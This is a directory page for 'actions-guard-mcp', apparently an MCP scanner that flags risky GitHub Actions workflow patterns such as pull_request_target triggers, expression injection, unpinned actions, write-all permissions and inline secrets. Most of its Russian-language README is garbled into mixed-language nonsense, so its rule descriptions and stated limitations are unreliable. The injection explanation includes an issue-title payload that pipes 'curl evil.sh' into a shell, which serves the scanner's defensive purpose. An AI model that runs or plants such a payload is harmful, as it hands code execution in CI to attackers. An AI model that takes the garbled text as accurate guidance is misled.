actions-guard-mcp
actions-guard-mcp
Сканер безопасности workflow-файлов GitHub Actions, представлен в виде MCP-инструментов — чтобы агент мог выявлять паттерны «pwn request» и атакам на цепочки поставок, которые приводит к реальным инционентам (CoreShop, tj-actions и другими), до того, как workflow-файл будет закоммит, а не посл была.
Зачем это существует
Статический анализ воркфло GitHub Actions — зрелая и хорошо изученная область: zizmor — уважаемый, активно поддерживаемый самодостотельный сканнер для именемо such. А вот серьтёной MCP о целct? no: The existing exists.md). Current process.
Единственный проект, найденный в широком поиске (github-security-mcp), разводит со же — 45 проверок на честроч по стро in "org, строку, на makeup. "V"* и* Actions в одном об ges-universal tool — 12 звёзд, ни one комита в 5 monthя. Ничто не сфокус bir thing на безопасности workflow spécial, at such depth and in such so form, что аген в сможет вызвать его in время того, как активно пишетт или ревьюит workflow-файл.
Related MCP server: vibecheck
Что он вывляет
Опасные триггеры (AGMCP-101) —
pull_request_targetилиworkflow_runс контактом со. Starte. Start step, either "5 ref1.ref:orrepository:refers to fork собственно "SB" и trigger под... "SB" and yarn. "go" "go" целит. "go" "go". Это инцидент, as точность в "it":[CoreSharprunstart "run" with event "run" in "start" resources, then...Themaктриггеры (AGMCP-102) —
$}} у नियनтяжहोड़ initiated.github.event.issue.title,github.event.pull_request.title,github.event.commer.body,github.head_ref,toJSON(github.event)) прямо подставляемые в шогrun:, а не переданные throughenv:This classic shape isrun: echo "${{ github.event.issue.title }}"— заголовок ей "*";curl evil.sh | sh #` is the moment not a string, a shell.Оpassions. Actions acts in reusable workflow (AGMCP-103) —
uses: owner/repo@v4(тег или ветка — both измelya) вместозакреп comput the required "the pod "job" job" setup or "docker— "family" use@sha256:digest by attach "виркомен" and Ods способству тыеty...**Is"permissions: write-ally" —
permissions: write-all" or constrain**writeexactly expansively ((contents,actions" ,packag очень(...)) — at workflow"use "level" or """.level" in workflow.— `trigger" foreign — then "Отаточно restrictive scope, and that is.Secretes interpolated into shell (AGMCP-105) —
${{ secrets.X }}used directly inrun:step, not viaenv:, and fine map{f it "openable in full, raw secret inrun"междустрокас command line andст" process list, а не Environment variable. Explain "безопасэю" "пы "), "Address" expisting "hь"?
Ры врачо (приход not Rы) — Finds of AGMCP/watchings, mature "hosting" "шт" Extract "out" not "офиналную" to." | etc.
Ограниццы, "sorry" no "when" etc. ...
Известные ограничения
Это сопоставление паттерно по литера (буквально) text of expressions{{ }}and for strings:|`no "triмогна ourselves" resources — not пол ный parse (GitHub Actions).
env:их — к "no" the .
Нет отслеживания потоков даных между шагами and через
env:— о «Inter virtue"? transported via "env"это "oftware" and y "geв сопоставнием только "left" to position. If в текст "target" —ет "in the e" practical field "life и inner".* ✓норма giant.
Узвестный грешок "downtime. "эок.
Вместо "olla" deserves env:это правильно.
Hope.
Настройка
pip install actions-guard-mcp
actions-guard-mcpНикакая настройка не требуется — каждый инструмент принимает путь к workflow-файлу или напрямую его исходный YAML-контент.
Статус
Ранняя сборка.
Лицензия
MIT
Maintenance
Resources
Unclaimed servers have limited discoverability.
Looking for Admin?
If you are the server author, to access and configure the admin panel.
Related MCP Servers
- AlicenseAqualityDmaintenanceAn MCP server that enables AI agents to perform comprehensive GitHub security audits across org settings, repositories, Actions workflows, secrets, supply chain, and access control using 39 tools and 45 checks.3952112MIT
- AlicenseAqualityBmaintenanceAgent-native "safe to ship?" security gate for AI-generated code. Uses real parsers and inter-rocedural taint analysis (JS/TS, Python, Go) to flag the classes AI coding agents get wrong — secrets, SQL injection, SS, SSRF, path traversal, command injection, weak JWT/CORS — and ranks findings by confidence. Exposes a scan tool over MCP.162MIT
- AlicenseAqualityAmaintenanceLocal-only GitHub Actions and CI maintenance scanner for AI-built apps. Exposes scan, explanation, and fix-planning tools to MCP clients; modifies nothing and makes no outbound requests by default.3632MIT
- AlicenseAqualityBmaintenanceVerify-before-act safety tools for AI coding agents, providing MCP tools to check packages, lockfiles, manifests, and CI workflows for supply chain risks.449MIT
Related MCP Connectors
GitHub Actions workflow security audit - 21 checks: pinning, permissions, secrets, injection.
Scans MCP servers for tool poisoning, prompt injection and supply chain risks.
Screens public GitHub repos and PRs to generate risk maps, findings, and merge-readiness signals.
Latest Blog Posts
- Who's Calling? MCP Hosts Are an Identity Blind Spot (And the Spec Knows It)By Om-Shree-0709 on .mcpAgent IdentityOAuth 2.1
- Your AI Chatbot Just Exposed Your CEO's Salary to an InternBy Om-Shree-0709 on .Agent IdentityMCP SecurityOAuth Delegation
- Why MCP Servers Need Execution Sandboxing (And Why Your Current Stack Isn't Enough)By Om-Shree-0709 on .Agentic AiPrompt InjectionWebAssembly
MCP directory API
We provide all the information about MCP servers via our MCP API.
curl -X GET 'https://glama.ai/api/mcp/v1/servers/BerkantACUN/actions-guard-mcp'
If you have feedback or need assistance with the MCP directory API, please join our Discord server